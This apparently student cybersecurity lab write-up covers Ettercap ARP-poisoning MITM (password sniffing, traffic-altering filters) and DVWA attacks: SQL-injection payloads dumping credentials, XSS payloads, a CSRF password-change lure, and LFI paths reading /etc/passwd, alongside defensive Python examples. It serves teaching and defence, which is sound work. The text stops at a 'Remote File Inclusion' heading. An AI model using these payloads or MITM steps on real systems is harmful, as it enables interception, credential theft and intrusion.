CSW Exp 5-10

The document outlines an experiment on ARP poisoning attacks using tools like Ettercap, explaining the ARP protocol's role in mapping IP addresses to MAC addresses and how ARP spoofing can lead to Man-in-the-Middle (MITM) attacks. It details the process of setting up an ARP poisoning attack, capturing traffic, and the implications of such attacks, including the ability to intercept sensitive data. The document also discusses the use of Ettercap for executing these attacks and highlights the importance of security measures that mitigate ARP poisoning risks.

Uploaded by

ssyy5366
Experiment-5

Object: - ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze the captured packets to understand how the attack can lead to a Man-in-the-Middle scenario.

ARP Poisoning and the Usage of Ettercap


Before diving into ARP spoofing, let us understand what ARP (Address Resolution Protocol) means. Machines use the logical address (IP address) to send and receive messages, but it is the physical address (MAC address) at layer 2 of the OSI model that carries out the actual communication. So a sender must obtain the destination MAC address in order to communicate with other devices. This is where ARP comes into the picture: it is the protocol responsible for mapping IP addresses to their corresponding MAC addresses. The ARP protocol provides two basic functions:
• Resolving IPv4 addresses to MAC addresses: For a frame to be placed on the LAN media, it must have a destination MAC address. When a packet is sent to the Data Link Layer to be encapsulated into a frame, the node refers to a table in its memory to find the Data Link Layer address that is mapped to the destination IPv4 address. This table is called the ARP table or the ARP cache. The ARP table is stored in the RAM of the device. You can view your ARP cache by issuing the arp -a command in the Command Prompt or Windows PowerShell. Each entry, or row, of the ARP table holds a pair of values: an IP address and a MAC address. The relationship between the two values is called a map. It simply means that you can locate an IP address in the table and discover the corresponding MAC address. The ARP table caches the mappings for the devices on the LAN.
Figure 1: ARP Cache Table
• Maintaining a cache of mappings: The ARP table is maintained dynamically. There are two ways that a device can gather MAC addresses. One way is to monitor the traffic that occurs on the local network segment. As a node receives frames from the media, it can record the source IP and MAC address as a mapping in the ARP table. As frames are transmitted on the network, the device populates the ARP table with address pairs. The other way a device can get an address pair is to broadcast an ARP request. ARP sends a layer 2 broadcast to all devices on the Ethernet LAN. The frame contains an ARP request packet with the IP address of the destination host. The node that recognises the IP address as its own responds by sending an ARP reply packet back to the sender as a unicast frame. This response is then used to make a new entry in the ARP table. These dynamic entries in the ARP table are timestamped. If a device does not receive a frame from a particular device before the timestamp expires, the entry for that device is removed from the ARP table. Additionally, static map entries can be entered in an ARP table, but this is rarely done. Static ARP table entries do not expire over time and must be manually removed.
ARP process for requests to IPs outside the LAN
Figure 2: Asking for MAC address of Default Gateway

Figure 3: Layer 2 Broadcast in LAN to find Default Gateway MAC


Figure 4: Host B ignores the Broadcast Message

Figure 5: Default Gateway responds to the Broadcast Message with its MAC
Figure 6: Host A update its ARP Cache with IP and MAC address mapping
First of all, Host A is sending to an IP address that is not in the range of the local area network IPs. Therefore, it will ask for the MAC address of the default gateway IP (192.186.1.254 in this case) by sending a layer 2 broadcast message to all the hosts in the LAN. As shown in figure 4, Host B will ignore the message because the IP does not match its own. But the router (default gateway) recognises it as its IP address and responds to Host A with its MAC address in the reply. After that, Host A dynamically caches that mapping in its ARP cache. From then on, whenever it sends traffic to outside networks, Host A will use that MAC address together with the default gateway IP address to generate frames at the Data Link Layer of the OSI model.
ARP Spoofing/Poisoning
ARP spoofing is a technique where the attacker sends malicious ARP packets to the default gateway and to the host that is communicating with the default gateway in the local area network. The main intention is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. It allows the attacker to intercept and modify data frames. As a result, it leads to the common attack known as the Man-in-the-Middle attack (MITM).
Figure 7: Host B, the unethical hacker/attacker, launches an ARP poisoning attack

Figure 8: Hacker modified the ARP Cache of Host A


Figure 9: Re-route the traffic of Host A to the Attacker
Figure 10: After reading the data packets, the attacker routes the traffic on to the default gateway
Imagine that Host B in the above scenario is an unethical hacker/attacker. He/she can use a hacking tool like Ettercap to modify the ARP caches of the host and the default gateway, then listen to and capture the data frames exchanged between them. Let's see how a tool like Ettercap can be used to achieve such tasks.
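As an added example (not part of the original lab), the Python below applies the detection logic a defender would use against the scenario in figures 7 to 10: an IP whose announced MAC suddenly changes, one MAC answering for both the gateway and the host, and replies that contradict a pinned static entry. The ARP reply log and the static table are constructed for the example, not a real capture.

```python
from collections import defaultdict

# Constructed sample of ARP replies in the form a LAN monitor would log them
# (time, "reply", sender IP, "is-at", sender MAC). Not a real capture.
# The last two lines mimic figures 7-9: one MAC starts answering for both the
# default gateway (192.168.1.254) and Host A (192.168.1.10).
SAMPLE_ARP_REPLIES = """\
10:00:01 reply 192.168.1.254 is-at aa:bb:cc:00:00:01
10:00:02 reply 192.168.1.10 is-at aa:bb:cc:00:00:10
10:00:05 reply 192.168.1.254 is-at aa:bb:cc:00:00:01
10:00:09 reply 192.168.1.254 is-at de:ad:be:ef:00:02
10:00:10 reply 192.168.1.10 is-at de:ad:be:ef:00:02
"""

# Assumed static (manually pinned) entry a defender keeps for the gateway,
# the "static ARP entries" mitigation named later in the text.
TRUSTED_STATIC_ARP = {"192.168.1.254": "aa:bb:cc:00:00:01"}


def parse_replies(text):
    """Return a list of (time, ip, mac) tuples, one per ARP reply line."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[1] == "reply" and parts[3] == "is-at":
            records.append((parts[0], parts[2], parts[4].lower()))
    return records


def find_mac_changes(records):
    """Flag any IP whose announced MAC differs from the one first cached for it.

    This is what happens to Host A's cache in figure 8: the gateway IP is
    suddenly mapped to a different MAC.
    """
    first_seen = {}
    changes = []
    for when, ip, mac in records:
        if ip not in first_seen:
            first_seen[ip] = mac
        elif first_seen[ip] != mac:
            changes.append((when, ip, first_seen[ip], mac))
    return changes


def find_shared_macs(records):
    """Return MACs that claim more than one IP: the attacker answering for both sides."""
    ips_per_mac = defaultdict(list)
    for _, ip, mac in records:
        if ip not in ips_per_mac[mac]:
            ips_per_mac[mac].append(ip)
    return {mac: ips for mac, ips in ips_per_mac.items() if len(ips) > 1}


def violates_static_entries(records, trusted=TRUSTED_STATIC_ARP):
    """Replies that contradict a pinned static entry for a critical host."""
    return [(when, ip, mac) for when, ip, mac in records
            if ip in trusted and trusted[ip] != mac]


if __name__ == "__main__":
    recs = parse_replies(SAMPLE_ARP_REPLIES)
    for when, ip, old, new in find_mac_changes(recs):
        print("MAC change for %s at %s: %s -> %s" % (ip, when, old, new))
    for mac, ips in find_shared_macs(recs).items():
        print("MAC %s claims several IPs: %s" % (mac, ", ".join(ips)))
    for when, ip, mac in violates_static_entries(recs):
        print("Reply at %s contradicts static entry for %s (got %s)" % (when, ip, mac))
```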
Usage of Ettercap
If you have the Kali Linux operating system, the Ettercap program is installed by default. Ettercap has a graphical interface that is very beginner-friendly, unlike many programs that are command-line-based only. If you don't have it in your system by default, use the following command to install it:
> apt install ettercap-graphical

Figure 11: Kali Linux Operating System


Figure 12: Open the Ettercap Program

Figure 13: Ettercap Home Screen


Figure 14: Click The Tick icon on the top right corner to run the Ettercap
First, open the Ettercap program and you will get the display shown in figure 13. Then click the tick icon in the top right corner to run Ettercap, as shown in figure 14. After that, click the three-dot icon and go into Host. Then select the Scan for hosts option. To display the list of scanned hosts on the network, go into Host again and select the Host list option. Now you can see the hosts available in the local network, as shown in figure 19 below.
Figure 15: Host option inside Three dots icon

Figure 16: Scan for host option inside Host option


Figure 17: Scanning Summary

Figure 18: Host list option inside Host option


Figure 19: Summary of the list of hosts available inside the local network
To initiate the ARP poisoning attack, click on the host and the default gateway to add them as targets, as shown in figures 20 and 21. After that, to start the ARP poisoning attack, click the globe icon in the top right corner and select the ARP Poisoning MITM option, as shown in figure 22. Now, as the attacker, you can use the Wireshark tool to trace the packet transfer between the host and the default gateway. Let's imagine that, as the victim, you are communicating with an HTTP-based website. The moment you enter the username and password for that website, the attacker can filter that traffic and obtain the username and password through Wireshark, as shown in figures 24 and 25. The attacker's Ettercap program will also report it, as shown in figure 26. The password and username are visible because the unencrypted HTTP protocol is in use.
Figure 20: Add Host as a Target in Ettercap

Figure 21: Add Default Gateway as a Target in Ettercap


Figure 22: Selecting ARP poisoning option to start the ARP poison MITM

Figure 23: Filter ARP request in Wireshark


Figure 24: Filter frames that contain PWD (password) field

Figure 25: Explore PWD (password) field in Wireshark as messages are not
encrypted since using the HTTP protocol
Figure 26: Ettercap automatically detect and display packets or frames with PWD
(password) fields
Nowadays, ARP poisoning is rarer and is mitigated by the use of encrypted communication (HTTPS), Dynamic ARP Inspection, static ARP entries, VPNs, and packet filters.
MiTM Attack with Ettercap
Man-in-the-Middle attacks can be among the most productive and nefarious
attacks. If the attacker/hacker can place themselves between two systems
(usually client and server) they can control the flow of traffic between the two
systems. In this way they can eavesdrop on the traffic, delete the traffic, inject
malware and even alter the traffic (imagine altering email!). In previous tutorials, I
showed you how to arpspoof and dnsspoof to execute a MiTM attack, but in this
tutorial we will use a GUI MitM tool known as Ettercap.

Ettercap is probably the most widely used MiTM attack tool (followed closely
behind by Cain and Abel, which we will look at in the later tutorial).

Ettercap was developed by Alberto Ornaghi and Marco Valleri. It is basically a suite of tools to simplify MiTM attacks. It can be used either from the command line (CLI) or the graphical user interface (GUI). In this lesson, we will use the GUI.
Ettercap enables us to place ourselves in the middle between two machines and then:
• infect the traffic with malware
• delete traffic
• sniff passwords
• provide fake certificates for HTTPS
• DNS spoof
The principles and techniques of a MiTM attack remain the same as with arpspoof, with the small exception of ip_forward. Unlike arpspoof, Ettercap does not use IP forwarding in the Linux kernel, but instead uses its own module to forward IP packets.
It is important to note that Ettercap requires root privileges to open its Layer 2 (data link) sockets. In addition, as you might expect, it can slow down communication between the two target systems as it does its own processing.
Ettercap is a GUI-based tool built into Kali, so there is no need to download and install anything; let's get started doing a MiTM attack with Ettercap.
Step #1: Start ettercap
Let's view the help file for ettercap by typing:
kali > ettercap -h

As you can see, ettercap has a substantial help file for running it from the command line, but the only thing we need from here is the switch to run it in graphical mode. In the bottom line of the screenshot (not the bottom line of the actual help file, as I have truncated it in the interest of space), you can see the -G switch. Adding it after the ettercap command will launch the ettercap GUI.
kali > ettercap -G
When we do, the ettercap GUI will start as seen below.

The first step in launching our MiTM attack is to start sniffing. Go to the pulldown menu that says "Sniff" and click on "Unified Sniffing".

When we do that, it opens a new window asking us what interface we want to use; it defaults to eth0.
When we click "OK", ettercap launches its sniffing and loads its plugins.

Our next step is to find the hosts on the network. Click on the "Hosts" tab and you will see a menu that includes "Scan for Hosts". Click on it and ettercap will begin scanning the network for hosts.
Now, using that same "Hosts" tab, click on "Hosts List". This will display all the hosts that ettercap has discovered on your network, as seen in the screenshot below.

Now, select one of the hosts that will be the target of this attack in the window by
clicking on it and then click on "Add to Target 1" at the bottom of the window.
When you do so, ettercap will add that host as the first target in our MiTM attack
as seen in the screenshot below.
Next, select the second host in this attack and then click "Add to Target 2".

Finally, go to the menu above and click on the MITM tab; the drop-down menu will have a selection called "ARP Poisoning", as seen in the screenshot below. Select it and it will open a pop-up window like the one below. Select "Sniff remote connections".
When we press OK, ettercap will begin ARP poisoning and you will see ettercap respond in its main window with the message below.

Now we have successfully placed ourselves between the two target systems and all their traffic must flow through us. This is where the fun begins, as we can now delete, manipulate, impersonate and view all their traffic.
Altering the Traffic
As I mentioned above, the real risk in a MiTM attack is that the attacker can eavesdrop on the Internet traffic as well as alter it, if they want. In this section, now that we are between the two systems, we will demonstrate the risks of a MiTM attack. We will use the MiTM attack to edit/alter the Internet traffic as seen by the target. In this way, the attacker can actually alter the content of websites, alter the content of an email, change the pictures seen by the target in their Internet traffic, delete specific Internet traffic packets, etc. The message should be clear: when we have placed ourselves in the middle, the target is at our mercy!
Step #2: Alter the Traffic
In this next section, we will be altering the traffic from an internal corporate intranet site. This site is used by all the employees for corporate announcements, scheduling, etc. Although this scenario is within a corporate intranet on a LAN, the technique and effect would be the same over the wider Internet. In our scenario, the manager has posted a new starting time for the following day because of a very heavy workload. As a result, he wants everyone to begin work at 6 am, and he posts this to the corporate intranet site for all the employees to see. Our attacker has malicious intentions toward the target and wants to alter the message to the target so that they instead come to work late, at 11 am. This is likely to have negative repercussions for the target from the manager, which is exactly what the attacker wants.
Step #3, Create the Intranet Site
The corporate Intranet announcement page looks like the screenshot below.
Everyone in the department will see it and although they are disappointed in the
earlier start time, they adjust their schedule to help with the additional workload.
Our attacker doesn't want the target to see this message, but rather an altered
message to mislead him as to the new starting time.

Step #4: Using Ettercap Filters


One of the many beauties of using Ettercap for MiTM attacks is the ease with which you can alter and edit the target's Internet traffic.
From the Ettercap GUI, you will see above the top menu bar a pull-down menu item labeled "Filters". Click on it and then click on "Load a Filter".
When you do so, a window like the one below will appear. To the right of the window we can see numerous filter files.

Let's take a look at the contents of that directory (/usr/share/ettercap) from a terminal in Kali. Open a terminal and type:
kali > cd /usr/share/ettercap
kali > ls -l

As you can see in the screenshot above, there are numerous Ettercap filter files. Note the one named etter.filter.examples. Let's open it with Leafpad and see what it contains.
kali > leafpad etter.filter.examples
This file contains numerous Ettercap filter examples of various types. We can use these as templates for creating our own filters. Notice the various types:
• display a message on port 22
• log all telnet traffic
• log all traffic except http
• do some operation on the payload of the packet (in this case change numeric
values)
• drop any packet containing a particular word or string
• log SSH decrypted packets matching a regular expression
• and many more
In our case, we want to replace words from a website with other words to alter
the meaning of the message. That is, we want to replace "Heavy" with "Light" and
"6" with "11" so that the message read by the target would be changed to:
Due to the Light Workload, Everyone is Expected to Come to Work at 11am
Ettercap has a pre-built filter file for doing precisely that! It's the etter.filter file.
Let's open it with Leafpad and take a look around.
kali > leafpad etter.filter

Notice that, starting at line 21 after the comments, we have some simple code that looks for TCP traffic (if (ip.proto == TCP)) containing data that matches the word "ethercap" (if (search(DATA.data, "ethercap"))), then logs it, replaces it with "ettercap" (replace("ethercap", "ettercap")) and emits a message about what happened (msg("Correctly substituted and logged. \n")). We can use this same code, but change the words it looks for and the words it replaces them with, namely "Heavy" and "6".
Next, we have to edit this Ettercap filter file. First, copy and paste all the uncommented code so that you now have two stanzas. Then replace the word "ethercap" with "Heavy" in the first stanza and, in the second stanza, replace the word "ethercap" with "6", as seen in the screenshot below.
Make all the changes circled in the screenshot above and save the file.
Step #5: Compile the Filter
Now, before we can use the filter, we must compile it. Open a terminal and type:
kali > etterfilter etter.filter -o etter.filter.heavy
Where:
etterfilter is the command to compile the filter file
etter.filter is the input file
-o etter.filter.heavy directs the compiled output to a new file
Step #6: Add the Filter to Ettercap
Now that the filter file has been compiled and is ready to use, we can go back to the Ettercap GUI, select "Filters" and click on the new compiled filter we created. When it appears in the "Selection" window, go ahead and click OK. This activates an automatic process whereby, in real time, whenever the word "Heavy" is seen in the Internet traffic it is replaced with "Light", and whenever the number "6" appears it is replaced with "11". It's important to note that this replacement will take place on ALL Internet traffic going to the target.
Now, when the target goes to the intranet site announcing the new starting time, they will see the web page shown below. Everyone else will see the actual intranet site, but the target will have those two words changed.

This tutorial demonstrates how easy a MiTM attack is using ettercap, and the power of being able to alter the traffic to the target system seamlessly and transparently. The end user has no indication that their traffic has been altered!
Experiment-6
Object: - SQL Injection: Use DVWA to practice SQL injection attacks.
Demonstrate how an attacker can manipulate input fields to extract,
modify, or delete database information.

Low-Level SQL Injection in DVWA


Below is the source code of the low-level SQL injection page in DVWA.

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

Searching for information


There is a form used to enter the User ID. If I try to input ‘1’, it will appear as
follows:

Form Input User ID ‘1’

To find out whether this form has a SQL injection loophole, we can try inputting a single quote (').

Single Quotes Inputting


And the result will be an error. This means we can do SQL injection.
If you ask why the result is an error, the answer is that when we input a quote, the query executed by the server becomes:

SELECT first_name, last_name FROM users WHERE user_id = ''';


You can see that there is a quote without a partner, which makes the query an error.

Doing Attack

After determining that there is a security hole, I try to input the following payload:

%' or '0' = '0

So the result of the query run by the server is:

SELECT first_name, last_name FROM users WHERE user_id = '%' or '0' = '0';

This will cause all available records in the table to be displayed.


All Available Records Displayed
View DBMS Version

We can also modify the payload. For example, the following is used to view the version of the DBMS in use.

%' or 0=0 union select null, version() #

The # sign in SQL starts a comment, so the rest of the original query is ignored.

So the result of the query run by the server is:

SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #';
The DBMS used is MariaDB version 10.1.26

View Tables containing the word ‘user’

‘% or 0=0 union select null, version() #

Tables Containing the Word ‘user’


Get users and passwords
%' UNION SELECT null, concat(user,0x0a,password) FROM users#

0x0a is hexadecimal for 10, which is the ASCII newline character.

Users and Passwords

So, how can we reduce this risk? One way is to use whitelist/blacklist validation.

Blacklist validation works by detecting whether the input contains a forbidden string. This validation can reject malicious queries such as DROP TABLE, which can wipe out our entire data. Whitelist validation works by only accepting input that belongs to a reserved set of strings/words. This can be achieved by checking that the input is an integer, or by providing a fixed list of inputs on the front-end.
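As an added example, not the lab's or DVWA's own code, the Python below reproduces the low-level query against a constructed in-memory SQLite table and places the hardened form beside it: the integer whitelist check suggested above, done on the server, plus a parameterised query. It uses the first payload from this experiment, which is plain SQL; the MariaDB-specific "#" payloads are not reproduced.

```python
import sqlite3

# Constructed rows standing in for DVWA's `users` table (assumption: same column names).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db():
    """In-memory SQLite database (the experiment uses MariaDB; the injection logic is the same)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of the DVWA low-level code: the raw input is pasted into the SQL string."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '%s';" % user_id
    return conn.execute(query).fetchall()


def probe_raises_error(conn, user_id):
    """True when the input breaks the query syntax, which is what the single-quote test relies on."""
    try:
        lookup_vulnerable(conn, user_id)
        return False
    except sqlite3.Error:
        return True


def lookup_safe(conn, user_id):
    """Hardened form: whitelist the input as an integer string, then bind it as a parameter.

    The driver sends the value separately from the SQL text, so quotes inside the
    value can never change the structure of the query.
    """
    if not (isinstance(user_id, str) and user_id.isascii() and user_id.isdigit()):
        raise ValueError("user_id must be a non-negative integer")
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (int(user_id),)).fetchall()


def safe_rejects(conn, user_id):
    """True when the hardened lookup refuses the input instead of running it."""
    try:
        lookup_safe(conn, user_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("normal input:", lookup_vulnerable(db, "1"))
    print("single quote breaks the query:", probe_raises_error(db, "'"))
    print("rows leaked by payload:", len(lookup_vulnerable(db, "%' or '0' = '0")))
    print("hardened lookup rejects payload:", safe_rejects(db, "%' or '0' = '0"))
```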
Experiment-7
Object: - Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in
DVWA to inject malicious scripts into web pages. Show the potential
impact of XSS attacks, such as stealing cookies or defacing websites.

Cross Site Scripting (XSS) | DVWA (Damn Vulnerable Web Application)
XSS is a technique in which attackers inject malicious scripts into a target website, which may allow them to gain control of the website. If a website accepts user input such as comments, a username field or an email address field without controls, then an attacker can insert a malicious script as well.

TYPES OF XSS:

1. Reflected XSS

2. Stored XSS

3. DOM-based XSS

Reflected XSS (cross-site scripting): RXSS

In this case the attacker's data is not stored on the website; reflected XSS executes only on the victim's side. The attacker sends an input script that the website then reflects back to the victim's browser, where the malicious JavaScript payload is executed.

Let's try cross-site scripting in a virtual environment

Requirements:

1. Xampp or wamp

2. DVWA (Damn vulnerable web application)


3. A browser such as Firefox, Internet Explorer, Cyberfox, Chrome, etc.

DVWA low level Reflected XSS:

Payload: <script>alert("xss")</script>

DVWA Medium Level Reflected XSS

Payload: <Script>alert("hack by falcon")</Script>


DVWA High Level Reflected XSS

Payload: <img src=x onerror=alert("falcon")>

Stored XSS (cross-site scripting): SXSS

In stored cross-site scripting the attacker's malicious code is stored on the target website's web server. When an attacker can submit malicious JavaScript into the website and that script is later executed on other users' computers, that is stored XSS.

DVWA Low Level Stored XSS:

Payload: <script>alert(document.domain)</script>
DVWA Medium Level Stored XSS

Payload : <img src=x onerror=alert(document.domain)>

DVWA High Level Stored XSS

Payload: <body onload=alert("bingo")>


DOM-BASED XSS:

DOM-based XSS is short for Document Object Model based cross-site scripting. Here the page's HTTP response itself does not change; instead, an attacker may use several DOM objects to create a cross-site scripting attack. The most popular objects from this perspective are document.URL, document.location, and document.referrer.

DVWA low level DOM XSS:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
DVWA Medium level DOM-based XSS:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
and reload your browser.

DVWA HIGH LEVEL DOM-based XSS:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script> and reload the browser.
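As an added example, not DVWA's own code, the Python below models the three reflected levels above: a filter that strips only the literal `<script>` tag (assumed to be how the medium level behaves), the low-level reflection, and output encoding as the fix; it also splits a DOM-XSS URL to show that the part after "#" never reaches the server, which is why the medium and high DOM-based payloads cannot be stopped server-side.

```python
import html
import re
from urllib.parse import urlsplit

# The three reflected-XSS payloads used at the DVWA levels above (copied from the page).
PAYLOADS = {
    "low": '<script>alert("xss")</script>',
    "medium": '<Script>alert("hack by falcon")</Script>',
    "high": '<img src=x onerror=alert("falcon")>',
}

# An opening tag is what turns reflected text into something the browser executes.
OPENING_TAG = re.compile(r"<\s*[a-z]", re.IGNORECASE)


def medium_blacklist(value):
    """Assumed model of the medium-level filter: strip the literal lower-case <script> tag only.

    It blunts the low-level payload but not a different case (<Script>) or a different tag (<img>).
    """
    return value.replace("<script>", "")


def render_vulnerable(name):
    """Reflect the input into the page unchanged, as the low level does."""
    return "<pre>Hello " + name + "</pre>"


def render_safe(name):
    """Hardened form: HTML-encode on output so the browser treats the input as text, not markup."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


def reflected_part(rendered):
    """Extract what came from the user out of the rendered <pre> block."""
    return rendered[len("<pre>Hello "):-len("</pre>")]


def still_executable(rendered):
    """True if the reflected input still contains an opening tag after rendering."""
    return OPENING_TAG.search(reflected_part(rendered)) is not None


def server_sees(url):
    """Split a DOM-XSS URL into what reaches the server (the query) and what stays in the browser.

    Text after '#' is never sent in the HTTP request, so a server-side filter cannot see it.
    """
    parts = urlsplit(url)
    return {"query": parts.query, "fragment": parts.fragment}


if __name__ == "__main__":
    for level, payload in PAYLOADS.items():
        filtered = medium_blacklist(payload)
        print(level, "after blacklist still executable:",
              still_executable(render_vulnerable(filtered)),
              "| after encoding:", still_executable(render_safe(payload)))
    print(server_sees("http://localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>"))
```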
Experiment-8
Object: - Cross-Site Request Forgery (CSRF): Set up a CSRF attack in
DVWA to demonstrate how attackers can manipulate authenticated
users into performing unintended actions.

DVWA CSRF (low, Medium, High)


CSRF, which stands for Cross-Site Request Forgery, is a type of attack where someone takes advantage of a user's active session on a website to make them perform actions they did not intend. This attack works when the user is already logged into the website or application.

DVWA Security Low

Source code

The flaw in this code is that it lacks proper CSRF protection. It allows an attacker to
craft a malicious URL and trick a logged-in user into unknowingly executing
unwanted actions on their behalf.

The vulnerability lies in the fact that the code doesn’t include any mechanism to
verify the origin of the request. As a result, an attacker can construct a URL
containing the necessary parameters (password_new and password_conf) and
send it to a victim. If the victim clicks on the malicious link while authenticated on
the vulnerable website, the code will execute the password change without any
further authentication or user consent.

Now, we are going to perform the attack.

First, I will create a new password "123" and click on Change.

After changing the password you can see in the URL that it lacks the necessary CSRF token. In the absence of CSRF protection, an attacker can exploit this vulnerability by tricking the victim into clicking on the URL while logged in to the vulnerable website.

Now we will display the HTML code for the page, which includes a link to download a game called "FIFA 2023", and the password has been changed by the attacker.

If the attacker sends this link to the victim, the password will be changed.
If the victim tries to open the HTML page, it will look like this....
When the victim clicks on the FIFA link, the password "12345" will be changed automatically.

We can see that the password has been changed

Security: Medium

First things first, let's change the security level of DVWA.
If we try to use the low-security method, it won't work anymore.

Low

As we know, we will first view the source code.


The flaw in this code is a Cross-Site Request Forgery (CSRF) vulnerability. The code
uses the HTTP Referer header to check if the request came from the same server,
assuming it’s a trusted source. However, the Referer header can be easily
manipulated by an attacker. This allows an attacker to create a malicious website
or craft a URL that makes a request to this script, tricking the user’s browser into
performing an unwanted action on their behalf, such as changing their password
without their knowledge or consent.

Can you see the difference? In the legitimate request we see there is a Referer, showing where the request came from. That matches, so the request goes ahead.
So what if we intercept the illegitimate request with Burp and add the HTTP Referer? Like so.

Password changed successfully

Now we will try to intercept the request and add a legitimate Referer using Burp Suite
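As an added example (not DVWA's code), the Python below contrasts the Referer check the medium level relies on with a per-session anti-CSRF token bound to the form. The parameter names password_new and password_conf come from the page; the form field name `user_token`, the host name and the response strings are assumptions.

```python
import hmac
import secrets


def referer_check(headers, expected_host="dvwa.local"):
    """Model of the medium-level defence: trust the request if the Referer names our host.

    A request assembled outside the browser (the page does it with Burp) can carry
    any Referer value, so the forged request passes this check exactly like a real one.
    """
    return expected_host in headers.get("Referer", "")


def issue_token(session):
    """Generate a per-session anti-CSRF token, store it server-side and return it for the form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def token_check(session, form):
    """Hardened form: the submitted token must equal the one stored in the session.

    A cross-site page cannot read the victim's session or form, so it cannot supply
    the token; compare_digest keeps the comparison constant-time.
    """
    expected = session.get("csrf_token")
    supplied = form.get("user_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def change_password(session, form):
    """Password-change handler that relies on the token, not on the Referer header."""
    if not token_check(session, form):
        return "CSRF token is incorrect"
    if form.get("password_new") != form.get("password_conf"):
        return "Passwords did not match"
    session["password"] = form["password_new"]
    return "Password Changed"


if __name__ == "__main__":
    # Constructed forged request: a Referer the attacker chose, no token.
    forged_headers = {"Referer": "http://dvwa.local/vulnerabilities/csrf/"}
    forged_form = {"password_new": "123", "password_conf": "123"}
    session = {}
    print("Referer check accepts forged request:", referer_check(forged_headers))
    print("Token check on forged request:", change_password(session, forged_form))
    forged_form["user_token"] = issue_token(session)   # only the real page can embed this
    print("Genuine form submission:", change_password(session, forged_form))
```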
Experiment-9
Object: - File Inclusion Vulnerabilities: Explore remote and local file
inclusion vulnerabilities in DVWA. Show how attackers can include
malicious files on a server and execute arbitrary code.

Understanding File Inclusion Attacks using the DVWA web application.
What is File Inclusion Attack?

It is an attack that allows an attacker to include a file on the web server through a PHP script. This vulnerability arises when a web application lets the client submit input into files or upload files to the server. A file inclusion vulnerability is distinct from a generic directory traversal attack: directory traversal is a way of gaining unauthorized file system access, whereas a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application.

This can lead to the following attacks:

1. Code execution on the web server

2. Cross Site Scripting Attacks (XSS)

3. Denial of Service (DoS)

4. Data Manipulation Attacks


Two Types:

a) Local File Inclusion

b) Remote File Inclusion

LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the
victim machine. This can be very dangerous because if the web server is
misconfigured and running with high privileges, the attacker may gain access to
sensitive information. If the attacker is able to place code on the web server
through other means, then they may be able to execute arbitrary commands.

RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file
on the local machine, the attacker is able to execute code hosted on their own
machine.

Remote File Inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities often found in poorly written web applications. They occur when a web application allows the user to submit input into files or upload files to the server. In order to demonstrate these attacks, we will be using the Damn Vulnerable Web Application (DVWA).

There are some prerequisites:

1. XAMPP
2. Damn Vulnerable Web Application (DVWA)

NOTE: For now, let's focus on file inclusion attacks. I am going to show you how to set up the lab using XAMPP, DVWA and more in my upcoming blogs.

Local File Inclusion in Action

Since you have an idea of what LFI is, let's see it in action. We will perform LFI attacks through the different levels of difficulty offered by DVWA.

Let's start with low difficulty.

Difficulty: LOW

Now start your machine and log in to DVWA, then go to the DVWA Security tab and change the difficulty level to low.

Go to the File Inclusion tab and change the URL from include.php to ?page=../../../../../../etc/passwd.
Then change the URL from ?page=../../../../../../etc/passwd to ?page=../../../../../../proc/version.
Difficulty: MEDIUM

Now, go on and try the exploits we used in low difficulty. You will notice that you
can’t read files like before using the directory traversal method. So, as you can see
in the below snapshot of source page, the server is more secure and is filtering the
‘../’ or ‘..\’pattern. Let’s try to access the file without ‘../’ or ‘..\’.

Change include.php to /etc/passwd


Now,change the URL from?page=/etc/passwd to ?page=/proc/version.

As you can see, it worked by entering the absolute path of the file directly. Let's
level up the difficulty to HIGH.

Difficulty: HIGH

Change the difficulty to HIGH and try all the exploits from the medium difficulty; you'll
notice none of them work because the target is more secure, as it only accepts
"include.php" or inputs starting with the word "file". If you try anything else, it
shows "File not Found".

At this level of security, we can still gather sensitive info using the "file" URI
scheme, because it starts with the word "file".

Change the URL from include.php to ?page=file:///etc/passwd

You will get the data of /etc/passwd file.

This is how you can exploit a file inclusion vulnerability using local files on the
web server.

Remote File Inclusion in Action

